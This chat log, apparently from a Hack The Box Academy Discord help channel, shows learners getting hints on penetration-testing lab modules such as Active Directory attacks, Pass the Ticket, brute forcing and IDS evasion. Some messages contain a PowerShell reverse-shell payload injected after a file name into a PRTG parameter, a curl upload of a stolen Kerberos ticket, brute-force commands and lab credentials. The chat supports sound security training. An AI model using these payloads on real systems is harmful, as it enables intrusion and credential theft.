#modules
hi guys. i just got the student premium for HTB. Doing the SOC path. is the rdp in windows section really slow? or is it just my pc
shouldn't be
Any settings that i might need to change?
not sure what you mean by rdp being slow but i assume you are referring to the network itself, if you are having a bad connection this might be the cause, maybe try lowering colors (i know remmina supports that)
I am very new to htb so i am not sure. I just spawned the target they gave me, and used remmina to enter the ip for the rdp machine
okay. will do that. Thanks
Working with IDS/IPS
Snort Rule Development
There is a file named log4shell.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to log4shell exploitation attempts, where the payload is embedded within the user agent. Enter the keyword that should be specified right before the content keyword of the rule with sid 10000098 within the local.rules file so that an alert is triggered as your answer. Answer format: [keyword];
I've downloaded the wireshark file but i'm not really sure I understand what I should be looking for. Can someone give me a hint
I am super glad to be here I have done 44 of these modules... looking forward to the discussion!
Currently working on the cpts path, nowhere close to finished but after I would like dive more into iot, radio/wireless. Are there any modules that go over that? I did a search and only saw some modules cover the topic but im unsure if there is a module dedicated to it? If not any ideas where I could find more info on these topics
there's no real module dedicated to that topic
the topics covered in academy are more related to web/system hacking not IoT hacking
Still feeling stupid and unable to get it to work!
Ahh I see thank you for the info
MODULE: ATTACKING WEB APPLICATIONS WITH FFUF -> In the GET-Parameter fuzzing there is an assumption that the parameter we are fuzzing for is set to the value "key". Is this for the sake of the lesson? Or should I be aware of how to discover the value of the parameter I am fuzzing for as well?
I can get them to connect both ways but can't then run RDP on either!
the value is arbitrary. you're just trying to probe a different response from the web app
you'll also learn later in the module how to fuzz for values
Understood. Appreciate u
Can anyone help me with "Find out which domain the server belongs to." from the enumeration module. I tried many things and nothing is working??? What is THM looking for???
well we can't help with THM stuff
if you mean HTB generally the domain is something.somethingelse
i.e. google.com would be the domain
better tell what things you did
I understand, but nothing is working. Anyway I will try in another place.
also "from the enumeration module" doesn't help if you're doing htb academy
there's a handful of "enumeration" modules
hahahhaa
sometimes i feel like it's the exact opposite
i think the same
but usually they're very patient
it very much depends
there's two things that bug me: Poorly phrased questions - and a clear unwillingness to learn
Any help on the apocalypse challenge for noobs? Most of these are really like Got me lost not sure if it’s a riddle or wants me to do something
if you're in the second camp of a clear unwillingness to learn - my patience will run out quick and I will tell you you're SOL and move on
I will generally try and help rephrase a question if it's at least somewhat understandable
considering that English isn't many people's first language some minor differences do happen
i.e. 'make' being used for 'completing'
that makes sense
but if you're literally copy/pasting the question without providing info on what you've done, it doesn't help anyone to troubleshoot with you
and i mean with not for
like if you copy/paste a verbose error that is very specific about what it's expecting/wanting then -- yeah that's on you
i think sometimes people forget that there is the aspect of you actually doing things
like your example copy and pasting a verbose error message and asking what to do, in that moment i think they're too caught up in following instructions
tunnel-visioned is the phrase i'm looking for
well it's not really that
it's moreso copy/pasting the question with "I'm not sure what to do"
which isn't helpful for anyone in helping diagnose either a tool or skill issue
Were you actually able to get it to work?? I tried your Suggestions and also googled a ton but it just wont run
i see
Yes I was
that's understandable
sudo apt install python2 should install python2 just fine iirc
i think there was some part in the Learning Process module that talked about asking good questions
and pip is good for installing a bunch
most people don't know how to ask good questions
it's a surprisingly uncommon skill
i.e. "X isn't working" isn't descriptive; "I tried to do X with Y options and it's not working"
Detection & Analysis Stage (Part 1)
At this point, we have created processes and procedures, and we have guidelines on how to act upon security incidents.
i dont really know where "processes" came from, i guess the word policies and procedures fit better ? or i dont know "processes" meaning. Perhaps it is a typo and instead or "processes" is supposed to be "policies"?
can sometimes lead to "just reset the lab and it should work"
it's basically a series of steps
i'm not sure that "policies" would be a better word choice in this case
processes is the right word here
Has anyone here completed the "intro to network traffic analysis" module???
you literally just asked - you don't need to bump
and i'm sure plenty have but that's not your core question, is it
yep
in future: just ask your question
i'm bumping this question
you don't need a leading question to ask a question
let me revise it a little
Could be stupid by why exactly do we use these 2 ip's
I understand the concept
just not where these 2 ip's came from
the first one is your tun0 ip the second is the target IP
or more specifically it's your ip; imo they should change the command to be -i tun0
in the "intro to network traffic analysis" module, actually, i've been trying to complete that guided lab in there but while using the xfreerdp, i get a pop up in the machine asking for a password for "mrb3n"?? i've tried using my vm password and still failing to get authenticated.
because your vm password isn't that password
then what is it
i'm sure the question might provide credentials
whattt
that makes a bit more sense but what exactly is the tun0 ip? and the 2nd one is the ip for my vm?
usually in a little text above the question
I get that it's intercepting the information between my ip and the target ip when I do the ncat connection
but how exactly do I find/get my tun0 ip
tun0 ip is the IP assigned to your tun0 interface; the second one is the target/victim machine that's spawned with "Click here to spawn target system!"
ip a
Thanks Ill try again. I do have python 2 installed already. Will check again
that cant be right for the 2nd ip being the target machine
it is
my target ip is different
no but during the active portion of the lab the command still worked
they use a general one
in the question? ofc since most machines have diff IP. and they put that one just as a general one
perhaps you got lucky and your spawned target matched the IP of the examples
which can happen
most likely
you have to know how to adapt commands to suit your needs
so for future ref, do "ip a" to get mine, then just swap the other for the target
Are the chances of that occurring really that high?
@fathom pendant i have DM you... plzz check
you won't always be able to just copy/paste commands without modifying them
no
in future: ask before dming
don't just DM then ask
yes. most commands dont require your own IP tho. so you need to understand what commands do and change the stuff according to your needs
yee
I will 1000% ignore requests
Thanks guys :)
I also haven't done that module @naive imp so I'm making a general assumption based on other modules
so I can't help you further beyond "read the section"
bruhhh
but usually credentials you'd need are provided by the section
Howdy,
Recently joined the Discord and I have been stuck for a few hours on the Login Bruteforcing HTB Academy module. I'm in the process of completing the Login Form Attack section and have used Hydra (correctly I think). I grabbed the creds, attempted to login via the website's GUI and it doesn't seem to be working. Tried reproducing my efforts with the creds with cURL and that didn't seem to work as I was hoping it'd provide the HTML source with the HTB{} flag. Any/all advice would be great!
an example of provided credentials from the attacking common services module
not worked till now bro
anyone plzz help me with this... i've tried using the password provided above the question also
If you are using the password that the module provides you, then the error is elsewhere. Refresh the module and ensure you are still logged in.
you have to use the username and password provided
not just the password
hello im stuck on the question in the AD module, living off the land section: RE: Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
i did the UAC =2 to get disabled account
the creds provided definitely works, what's the command you used to connect and what's the error?
just to be clear, you are using these credentials, right
any hint for LockTalk API: step 2
what module is this related to?
if it's for an apocalypse ctf challenge: #1204440084867325982
and net [users found] but got no luck
you should mostly be able to use the provided ldap query
you might need to change a couple parameters i.e. OU stuff
So I got the virtualenv for python2 I think and installed the requirements.txt successfully, but I still get an error that it can't find the yaml module..? Did you have that issue as well?
ImportError: No module named yaml
Edit: Seems to work now, needed to specify the full path to python2 binary
but i am not talking about the terminal... i am talking about the authentication for "mrb3n"
For the purposes of htb academy, when I find all these from an axfr, do I have to put each IP in /etc/hosts for them to work properly for directory enumeration?
why are you trying to authenticate as mrb3n
bcoz its not connected to any network by default and we have to connect it to the "ENS224" network right??
no
also dig has nothing to do with directory enumeration
I know that
it has to do with subdomain enumeration
but directory enumeration is another tool entirely
I meant hitting the other zones with something like dirsearch
i already found a user called "Betty Ross" but when doing net user /domain 'Betty Ross' it says username not found
all you have to do is open Wireshark and capture on the ens224 interface
I'm not sure what you're getting at, connect via rdp, use wireshark
because that's not their username
Can anyone kindly provide me with any insight? I might be missing something so small and need to step away to see the full picture
"Using what you learned in this section, try attacking the '/login.php' page to identify the password for the 'admin' user. Once you login, you should find a flag. Submit the flag as the answer. "
also i cant see any ens224 interface on the wireshark on the default page which shows eth0, any, tun0 and other interfaces??
Hi all, need help with NTLM Relay attacks - skill assessment with the question: Submit the password of the SQL user 'sqlftp'. I have access to Backup01$. I looked in the ShareBackups and nothing interesting there. Also have used ticketer.py to request a ticket with Backup01$ nt hash for -spn cifs/sql03.inlanefreight.local Administrator but doesnt seem to work. Any help greatly appreciated.
did you rdp?
check what you can access with the creds you have, look inside shares
found it... after i reopened the wireshark
im stuck dont know how to find username
tried some combinations with that filter ldap feature but i think im lost
samaccountname iirc
oh
you can also likely make an educated guess based off of other users so far
Well I'm assuming he's on Kali and Kali has python but the pip is sometimes broke depending on versions
¯\_(ツ)_/¯
So you have to install python2's pip to install something (I think this is just what worked for me)
Works fine on pwnbox for that module so
yes
i just didnt want to dig through all the usernames, especially since the module wants you to use that ldap filter
The only clear text password i have is for sql_ftp_test. I do have the sam dump of Backup01$. Can I DM you?
but my bad i didnt see the samaccountname attribute in the section example
anyways thanks :3
that password is useful, look inside the shares of sql01
aa ok
on the nmap scripting engine module I could use a nudge in the right direction, I've done the command
sudo nmap 10.129.33.55 -sV -p 80 --script vuln
I just need a nudge on what im looking for exactly
Hi
even using grep to look for a "flag" hasn't yielded results
I do get responses in response to the search but
eternalblue doesnt work on windows 10 right
The flag command challenge is broken. It will not accept any answer but north; from there it gives options but only lets you choose a single answer, and all result in death. I could get past it if I were able to choose a different path, but I can't, so I'm stuck. It's broken for sure
but old version of windows 10 hv it or not
Also support chat not responding
Given that it asks you to choose north, south, east and west but you can only choose north, that's why it's broken, because north leads to death
nvm figured it out :3
I'm in module Password Attacks, Section Pass the Ticket (PtT) from Windows. I cannot RDP with the credentials that's given. Does anyone know if this is an error or am I doing something wrong?
wrap it in single quotes
^
So like "/u:administrator" etc.
$$ is a variable that calls the PID of the shell you're in
No, like /u:'username' /p:'password'
Thanks a lot! I'll give it shot
Single quotes tells bash to interpret it as a string and not a variable
That did the trick. Thanks guys ❤️
Also known as a string-literal
I'll for sure note that down. Wasn't really aware of that
Is anyone available to help with the Attacking Common Services - Easy lab?
Be more specific
heyo, quick question. Im doing the ips/ids evasion hard and when i do a scan all of the ports not open end up not being shown. im using 'sudo nmap <IP> -sS -sU -Pn -n -F' just wondering if im messing up somehow
I cleared it with that .exe for LaZagne, it was literally in the directions. I wasted so much time not paying attention. My fault. Thanks bro
I posted more details yesterday and my post was removed because it's a t2 module. I was told to only talk about anything over t0 in DM.
You can still ask questions
I've got a password with a "!" in it and bash doesn't like it. Quotes don't seem to work. How do I get bash to read it as just another character?
Single quotes doesn’t work?
I get a syntax error
Show me
Oh wait, that was double quotes. I'll try single
I am trying to use the WHERE command to find the flag and it just returns a blank page.
Single doesn't work either
Show me
Actually this is a new and exciting error
xfreerdp /u:fiona /p:'{redacted}' /v:10.129.200.178 -r disk:linux='/home/silvance'
[14:04:16:498] [2110006:2110006] [ERROR][com.winpr.commandline] - Failed at index 1 [/u:fiona]: Invalid sigil
Can you try without the r disk?
Huh, it works without the r disk. Never had an issue with it until now
I use /drive personally
I'll try that
So /drive:/home/silvance,KALI_SHARE
I use drive as well 😛
Gotcha
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer /dynamic-resolution like that
If you use discord search, there should be some hints on what to do
I have, and none of them seem to work. I even tried getting the output from the mySQL server as someone posted the direct link and still get NULL as an answer.
my next page is the easy lab, when i reach it, ill help you if I can
My inner onion is battling through the yearly Academy subscription, or making labs by myself (4x cheaper and "lifetime"). Working as admin for now
I do enjoy the Academy model, but upfront cost will cut my finances for 6-10 months
you don't have to get annual, if you're planning to do 1 path, getting 2 months of plat is substantially cheaper
Flip the order
Why
Nah, works for me
Huh. Neat I guess it just works that way
It’s how I have it in my notes, and I see it in my command history
I mean I guess it works in both ways
As either share,path or path,share
The man page only shows share,path
🤷🏼♂️
¯\_(ツ)_/¯
have you tried using them as login creds?
That's a strange looking set of creds
well its under admin pass
True.
I'll delete the photo just in case
Guys you know in the AD Enum & Attacks module. Whenever it says to RDP into MS01 and then ssh into a 172. address as htb-student. I always get permission denied. I've worked around it so far. But is it me or is it goosed? Is there supposed to be a trick to this? I just ssh htb-student@172.16.5.225 with the usual PW.
Miscellaneous misconfigs section at the moment
The 172 host is a completely separate host
I think I'm not getting this 
The ms01 host creds is the usual windows htb-student creds
The rdp is fine
172.16.5.225 is a separate linux host
So forward the port or tunnel or something?
If you want to interact directly with it via your own machine
It just says open a PS console and ssh in so I thought it was just simple
You can also open a powershell terminal and ssh to it
Thats the thing it won't let me do
😢
will htb ever fix the connection issues on the targets ? while the content is amazing i'm starting to get annoyed by the connection issues, keep swapping vpns around to sort this thing out is annoying
Can you link the section I can't find it
Its just worked
Some targets may not respond to pings
Who turned it on
No one
heyo noobie question im sure but does this -"Not shown: 869 closed tcp ports (reset), 128 filtered tcp ports (no-response)"- happen when you scan because of the IDS/IPS blocking it or is there something else? When i use a version scan i get more ports listed out than if i just do an -sS or -sU
I swear I've typed and pasted the same creds about 2000 times
i'm supposed to rdp into the target, rdp doesn't work either 🙂
Sometimes the windows labs need a few minutes to start up
Thanks for your help
Like up to 10 minutes in some cases
That makes sense. I've been needing ages for windows hosts to boot
i've had it running for longer until the connection dropped.. then restarted it, still not working, and no, the first time when i rdp'd into it it did not need any extra minutes 🙂
Reset target. Wait a few minutes. Scan with nmap to see if it's open
otherwise switch vpn regions, try again, make sure you use tcp ¯\_(ツ)_/¯
did i not say that i am doing that and i am just getting annoyed about doing that every now and then ? oh wait, you just sound like every generic customer support that ignores everything the customer says and gives generic advice lol 🤣
Don't gotta be a dick dude
If you're consistently having issues contact support
There's really not much that we can do to magically suggest a fix for your issue, aside from asking you to do what's worked for us
i'm not, but you try to answer a question that's not for you.
i've also not asked for a fix 🙂 obviously again you just ignore what i said
only asked if htb will ever fix those issues
I'm just saying complaining on the discord does nothing
As they seem intermittent, it doesn't look like they can narrow down a full fix
there you go, this was a good answer to give straight away
:x
Here you go being a condescending prick about it
🤣 i've yet to make you in any way while you already called me in a bad way twice
When you ask a question or make a statement in this channel it's generally assumed you're asking for help
Therefore I read it as you were asking for advice on how to resolve the issue presented
honestly sounds like an isp issue, i'd call them. i've never had issues with htb. it's been the most stable platform out of any i've tried.
Occasionally one or more of the regional servers shit the bed and die out
yeah i have seen that for sure
For a bit it was really bad due to upstream providers having network issues
can't be my isp as you can see from the picture i'm using the attack box 🙂
i didn't scroll up that far tbh, only read the last few msgs
But now it's just returned to the intermittent issues of "sometimes it just no work"
can i ask less module related questions here about personal vm setup/command stuff or is there another place?
using the attack boxes just because of those connection issues but yes i would love to use my vm...
ty
I'm stuck at this part of the Attacking Common Services - Hard lab. I know I need to impersonate but I don't fully understand this process
Hello, i got stuck on Password Attacks
Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
I got the username and password but when i log to smb i cannot get the flag.
The dir and ls command are disabled.
I dont know what to do
The error is related to the linked server, are you sure that linked server is correct
I'm not. This is my output.
It doesn't show \SQLEXPRESS at the end
hello, how do you check what groups a specific user in?
I thought I was getting closer with the impersonation error, but I'm still not sure on the syntax of the command
Follow the syntax from the mssql section
I did, but it gives an IP address. I didn't get an IP address
Specifically regarding accessing linked servers
I'm reading through the "Identify Linked Servers in MSSQL" section right now
You don't always need an ip
In this case the linked server is the fqdn
the AD module, powerview, netexec all can be used to do that
What's prompting you to select @@WINSRV02, and @@SQLEXPRESS
I thought the example they gave was a "fill in the blank" style command
No
Oh. Well that explains a lot
@@servername pulls the server name of the host of the dB, @@version pulls the version of the db
sorry, another question about this IPS/IPD evasion module. im trying to run the ncat with port 53 bound but im getting a
libnsock mksock_bind_addr(): Bind to 0.0.0.0:53 failed (IOD #1): Permission denied (13)
Ncat: TIMEOUT.
The command theoretically succeeded but it didn't do anything
Sudo
Anyone know if Linux fundamentals page 18/scheduling has an error in the question?
! ty
Whenever you see permission denied: Sudo
im stuck on kerberoasting from linux section : What powerful local group on the Domain Controller is the SAPService user a member of?
Forest for the trees
I got the right answer after failing a while. Then I looked up the answer. I noticed in the write up of it, that they had a different file name in their command to get the right answer.
There's no official writeup of academy modules
anyone having issues reaching the spawned machines? I can't reach them even within pwnbox
nvm it's working now
You need to specify the port after --source-port
sudo ncat -nv --source-port <your_port> <ip> <connection_port>
ah yea i didnt include it here sorry but i have
It can take a minute to connect and give you the answer
times out unfortunately
Try respawning the target and trying again
yep that did it ty
Is it allowed to stream while doing a hack the box challenge?
If you're referring to Academy content, only Tier 0 content may be streamed
If you're referring to content on the main platform, retired content may be streamed
More comprehensive breakdown: https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines
thanks a lot
ffs tried soooo many wordlists on SMTP till i saw the one in resources.... 
I've done that way too often. Sitting through 14 million words with rockyou.txt.
Hi friends! I'm on the basics path login brute force 2nd skills assessment (Service Login portion) and running into a wall on hydra brute forcing a web form. I'm either getting "[ERROR] the target is using HTTP auth, not a web form, received HTTP error code 401. Use module "http-get" instead" or I get all false positives if I use http-get. Any pointers?
DoS!
xd
I could really use some help from some File Transfer pro's. I have to upload this file krb5cc_647401106_I8I133. I've tried python server and scp but with no luck. I have root access on the target.
you're transferring from linux to linux or what?
Yes, exactly
why doesn't your python server work
python3 -m http.server
then just wget <ip>/file.txt
good idea! i'll try that out
172 is probably the wrong address
htb ip's start with 10.10
they use 172 for their separate vlans
When i do it with the target address it refuses the connection instantly
show that command
looks like there's a pivot
yeah that might be what's causing the issue. I've pivoted from normal user to root.
yeah right box is my host and the left is my target
yeah so i don't think the victim box is on the same network as your attacker box
they'd need to be on the same network to do that
True that. My brain is on 20% capacity, been battling with this section for a few hours now
i'm not sure of the context of how you're connected to the left box, but they're not on the same network it seems
It's the Pass the ticket for Linux Section in the Password Attack module
how are you connecting to the left box
First I pivoted from the user David, then to Carlos, then to svc and then I escalated privs on svc to root. So I've jumped quite a lot around in the system. And everything is pretty much pass the ticket.
well it sounds like the easiest way would be to xfer that file back to david's computer
then you can access it from your vm there, although somehow i doubt this is the intended way in the module just because it sounds so convoluted
but i haven't seen that module so i have no idea
yeah, that sounds like the "easiest" way to do it, even tho it feels a bit out of scope for this module
that doesn't answer how you're connecting to the left box
switching user != network pivot
switching user
something's not right and i agree with xre0us
somehow you got into a private network
yeah, the question is how you're doing that
switching user wouldn't help you to pivot in the network
you must have connected to a computer which had access to another network, and you used it as a jumpbox to the other vlan
I searched for a step by step guide, since i cant really explain it well. https://www.youtube.com/watch?v=qteCKiTkn_g&ab_channel=MonSi
"Unravel the Secrets of 'Pass the Ticket (PtT)' on Linux | Master the Art of Cybersecurity 💻🔐
🔥 Learn the Insider Tips to Pass the Ticket (PtT) Attack from Linux Systems! 🔥
Are you ready to level up your cybersecurity skills? 🚀 Join us in this action-packed tutorial as we demystify the infamous 'Pass the Ticket (PtT)' attack technique on Linux...
alright hold up, before we get lost in the weeds here, why do you need to xfer that file. what is the question in the module asking you? i highly doubt you need to get this back to your vm.
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
you don't need to take the file back to your box to do that
Yes, because I gotta change the settings of the KRB5CCNAME env variable to use Impacket with Proxychains and Kerb auth
It also says in the section Finally, we need to transfer Julio's ccache file from LINUX01 and create the environment variable KRB5CCNAME with the value corresponding to the path of the ccache file.
...so you're using proxychains?
you're on linux01 aren't you? isn't that the box on the left?
yes
and yes
so you're on the machine it wants you to set the env on...
idk actually, i dont know the full context of that module.. xre0us probably has better answers for you
if you have a kerberos ticket on the machine you should be able to just use it there
Yeah, but they make it seem that you have to export the file to your host and even mentions that I have to check the file transfer if I don't know how to transfer it.
But thanks a lot for your input, I really appreciate it!
export is a linux command
they're probably not talking about actually transferring the file
for example
that's an example
That might be it, I'll try it out!
Module: OSINT: CORPORATE RECON
Section: Locations
Question asked:
What are the city's coordinates where one of the company's offices, "inlanefreight.com" has its headquarters in Germany/USA/UK? We suggest to use https://latitude.to for this. (DD Coordinates format: 00.00000 0.00000)
Hint: If the settings are correct and the search is performed correctly, Google will display the coordinates in large print in the first position.
What i have done: I looked at the website and used the locations of the three cities mentioned on the offices page but these answers were rejected.
I don't see any other page.
The entity is not on Google Maps.
The google terms i used don't produce any location other than the page or one from cutestat.
Any hints or methods to get to the answer? Can DM me too.
how were you able to transfer svc_workstations's ccache?
I found the user by doing crontab -l and located the svc_workstations._all.kt and then I executed keytabextract.py and got the NTLM and then cracked it.
i believe the scenario here is that he has root access on a remote linux box and has obtained julio's kerberos ticket. all he needs to do is use the ticket to get julio's file... that's what it sounds like at least
yeah how were you able to transfer it out
I didn't transfer it out
ah
xre0us he was confused, the module says to export it, and it means the export command in linux, not to file transfer.
Finally, we need to transfer Julio's ccache file from LINUX01 and create the environment variable KRB5CCNAME with the value corresponding to the path of the ccache file.
Note: If you are not familiar with file transfer operations, check out the module File Transfers.
NCbirdman, In Linux, the export command is used to set an environment variable... so you need to set that ticket as the KRB variable and connect...
nah you need to transfer it out, there's no impacket on the first target so you need to do it in your own vm
Yes, I know. But it explicitly says I gotta transfer it out
I just did the whole thing again
'transfer it from linux 01..' --- to where?
you're root on the linux target yes?
Yes, I am
alright, run an upload server in your own vm, python3 -m uploadserver <port>, then in the linux host, upload it like this
curl -X POST http://ip:port/upload -F 'files=@fileName'
that was his problem, he pivoted remember lol
he said this is the question it's asking "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio." ---- this doesn't say anywhere he needs to xfer the file.
there's no pivot, it just doesn't show the 10.129.x.x ip for some reason on the linux box, even though that's how you ssh in, and running the python server doesn't open it on the 10.129.x.x ip
Oh ma god
you need to transfer the file, again there's no impacket on the first target so you need to ptt from your own vm
it worked
ahh ok
Thanks guys, u are the best
good job lol sorry i probably caused more confusion more than anything
now that I think of it, the ssh probably go through a router or something
No worries, I explained it so badly
the upload server worked?
Yes, it did. First try even
nice
Maybe I can actually go to bed tonight 
all good, I also forgot and had to do the whole thing again
All of us learned something new today
hi guys i am stuck on this in web information gathering module at active subdomain information. any help?
digging around will help find the answer
not everything will be on the initial domain
yah i am digging
subdomains exist
yeah i found sub dom list
some can be dug through, some cannot
should i dig all
i mean that's up to you; but the answer lies inside
hm
(yes that was an intentionally phrased hint)
target is not spawning. is the server down or something?
gotta be same for me
This is bad, sometimes I am busy or down. Now I get the time, server is down.
check tom user mailbox bro
maybe view source? also oof mobile
lmao ong

Read the section and follow the provided steps
There's a reason they give you a vHost to start with, like a benchmark
Hi, win privilege escalation, kernel exploit. I get a meterpreter shell, but can't execute any commands, the reason is timeout. Is it trouble with the connection or am I missing something?
hm
Hi everyone I think the answer is a no but just want to confirm - do the HTB Academy specific targets have an AU region option or are they exclusively in the US & EU?
getting a lot of lag and it's just a bit painful from down here 😢
I don't see any AU, only for the labs
thanks, not just me being silly then 😄
You may have to look at the code or use developer tools to find out what's going on in the background. This may influence your decision!
Why am I getting 54 correct passwords when performing a brute force using hydra? According to HTB I'm supposed to get 0, for it's only to verify that the default passwords and usernames do not work
any help to put this matter at rest will be appreciated
after :F= looks weird. can you show a pic of the webpage's msg about failing a login?
There are none unfortunately
well, you set up your hydra so it's looking for a failure message
it loads and returns the same page
makes sense thanks
go
Does anyone know how to change the payment method? I tried to change it but it ain't showing any other option than credit card
so i am trying to use whatweb to pull information on "dev.inlanefreight.local". the module states this is a vhost but only gives me an ip address that just defaults to an inlanefreight.local page. i cannot access the "dev." portion of the website whatsoever even when adding it to my /etc/hosts file
what am i doing wrong
Look at the format of the other entries, yours is wrong
It's ip domain/site
Quick question, I'm working on https://academy.hackthebox.com/module/113/section/1094 (PRTG Network Monitor) and following the instructions to gain remote code execution through notifications. Seems like I'm unable to get my reverse shell working though. Wondering if anyone could double-check my syntax and offer any hints.
Here's the Parameter value:
test.txt; powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('MY_IP_HERE',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
(As a side note, I was able to complete this through other means, just looking to understand what's up.)
very nice man !
Completing a 100% path is tiring when there are Windows machines taking a lifetime to spawn/access. Struggling with the Citrix Breakout section due to net issues.
Try running PS as admin
Finally I see, just exec with prog in c:/ at the admin
Support me ahah helpppp xD
Any idea what's causing these issues with reverse port forwarding? I don't have to get a successful connection to answer the questions and move on, but I'd at least like to get the connection so I understand the concept.
Hi guys, I am trying to do the nessus module in academy but not exactly sure how to connect to nessus
can I ping someone about it ?
I am on the Skill Assessment part
I've completed relatively the same amount, only have Windows priv esc left, but that seems long as hell so I've been putting it off
but not sure how to use nessus via the provided instructions
Read it again it walks you through it
Nothing has been announced yet. But the modules in the Academy give us hope for such a certificate. It has not been said when it will be released.
there are no news yet about a new cert. However there have been some more modules in the direction of advanced AD attacks and there are at least 3 modules regarding assembly/bof that are not yet part of any path
Take a look at the release dates of CBBH and CPTS. CBBH = March 22, CPTS = September 22
This year CWEE was published in February. If HTB does the same as in year 22, then we can expect another certificate in the fall.
I am sure that we will receive further information on HTB's social media channels in good time.
So keep your eyes open and check the social media channels regularly
hello, im having a problem differentiating between object ACE type and ActiveDirectoryRights. when we talk for example about GenericAll, it's an AD right, right? but what is the object ACE type
im stuck at ACL enumeration section : What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
i used bloodhound and found two AD rights to the GPO Management group but it seems that's not the answer
i used the PS command but seems to be freezing and unresponsive
I think your payload is wrong. You're getting a shell session but it gets closed.
I'm having trouble myself with the module ICMP Tunneling with SOCKS, it looks like the tunnel is very unstable (kali / virtual machine / pwnbox).
If I am right, then HTB still has a while to develop and release more modules
Can I ask someone about the server-side attacks skill assessment? It seemed a bit too easy?? Just want to make sure I didn't skip anything
Hi fellas! I could use some help.
Module: Password Attack
Section: Pass the Ticket (Linux)
Question: Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
I found the keytab for Linux01 as shown in my screenshot. I've tried to do Pass The Hash with NTLM and I've also tried to crack it but with no luck.
Can anyone nudge me in the right direction?
just pth?
What's wrong with this command:
xfreerdp /u:'htb-student' /p:"HTB_@cademy_stdnt!" /v:'10.129.223.195'
Try single quotes on password
Not sure if it makes a difference, just how I always do it
I've tried with different variations of the username. Like LINUX01$, linux01@inlanefreight.htb etc.
And I don’t use quotes on ip
the user might not have winrm rights, also you're supposed to target the DC
Linux01$ is a machine acc
woo just completed the knowledge check on getting started, that was a fun root
I'll delete this because there are too many spoilers
Take another close look at the log file. Your payload cannot work. It breaks the log file
oh ok
yea the log file does not record past that request
Take a look at how the log file is structured and then take another look at how your payload is structured. Then you will see what I mean
thanks for the pointer
You will probably have to restart your target. Because with your payload you have broken the log file and thus made a further payload impossible.
I still haven’t found :/
It is a Tier IV module and therefore costs 1000 cubes. As with all other modules, you get 20% of the cubes back on completion. So 200 cubes
Take another look at the keywords in the module. Then think about where the payload is transferred. Then you will also know which keyword you need to work with to find the string.
HEllo
What I don't have a access ?
Hey Guys, on this module I already have 2 of 3 questions. https://academy.hackthebox.com/module/116/section/1165
The last one is "Use the discovered username with its password to login via SSH and obtain the flag.txt file. Submit the contents as your answer." I already have the username, and I've run the resource password list provided in the module on Hydra, medusa, and msfconsole to crack the password and it never finds it. I've tried for days now. Am I missing something, or what else should I try?
Hi Guys, I need your help: Passwords attack modules
Find the user for the WinRM service and crack their password:
When I use this command :
crackmapexec winrm 10.129.x.x -u ./username.list -p ./password.list
It takes a long time, because it will attempt 1 password from password.list for all users from username.list before moving to the next password:
WINRM 10.129.x.x 5985 WINSRV [WINSRV\john:123456
WINRM 10.129.x.x 5985 WINSRV [-] WINSRV\dennis:123456
So I think that I can get a hint for a username from service NFS (111,2049)
sudo mount -t nfs -o vers=3,tcp,nolock 10.129.x.x:/J..x ./nfs_local
ls -la nfs_local
ls: cannot open directory 'nfs_jnfs': Permission denied
ls -ld nfs_local
drwx------ 2 4294967294 4294967294 64 Jan 6 2022 nfs_local
I'm stuck here. When I create a user with that GUID, this doesn't work; also with the command sudo su I don't have access permission
Am I going down a rabbit hole? Any hint will help me to figure that out. Thank you!
Try adding -windows-auth or something like that [I forget the flag for crackmap]
Every user can be bruteforced using the provided wordlist/mutated list
Unless you're referring to the skill assessment?
Hi, I have started the Footprinting medium lab but I guess I'm taking the wrong path. I have started to enumerate the different services with nmap. Found an nfs share with some ticket transcriptions and gathered the user&pwd in it. Still I have the feeling of being on the wrong path. Any suggestion?
You're close, look at the available services and think what you can use those credentials for
If you obtained credentials, you're generally on the right path
89% is impressive im at 23.
tell me, do you feel deadly yet?
Thanks @fathom pendant for the confidence boost! I'll keep trying then.
Can I dm you ?
Hey I m 21, I'm fine at the moment
@fathom pendant can you help me please with this exercise: https://academy.hackthebox.com/module/67/section/603
Haven't done this module
sure
Hello, did anyone encounter an issue related to VPN connection?
"sitnl_send: rtnl: generic error (-101): Network is unreachable"
I can't attach screenshot
Read and follow #welcome
Hey, I finally found it
but I have a second question: https://academy.hackthebox.com/module/67/section/605 for this exercise, where is capcom.sys????
2?
Why when i use nmap =p- 10.129.180.54 (the ip from hb to check telnet host)
nmap say: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-10 19:25 +04
Failed to resolve "=p-".
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.18 seconds
if i use -Pn nothing change
-p-
it's explained in the module itself
who's the slow one 
I use netcat to do port scanning 🙂
nmap -p- 10.129.180.54
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-10 19:38 +04
Nmap scan report for 10.129.180.54
Host is up (0.0013s latency).
All 65535 scanned ports on 10.129.180.54 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)
Nmap done: 1 IP address (1 host up) scanned in 105.42 seconds
well is that the right ip? give more information, module and section
GM! Still hung up on this and if anyone could assist I'd really appreciate it. Do I have to attempt the login after grabbing the creds on the site itself or via a command line?
Try nmap -sVC -p- <target_ip>
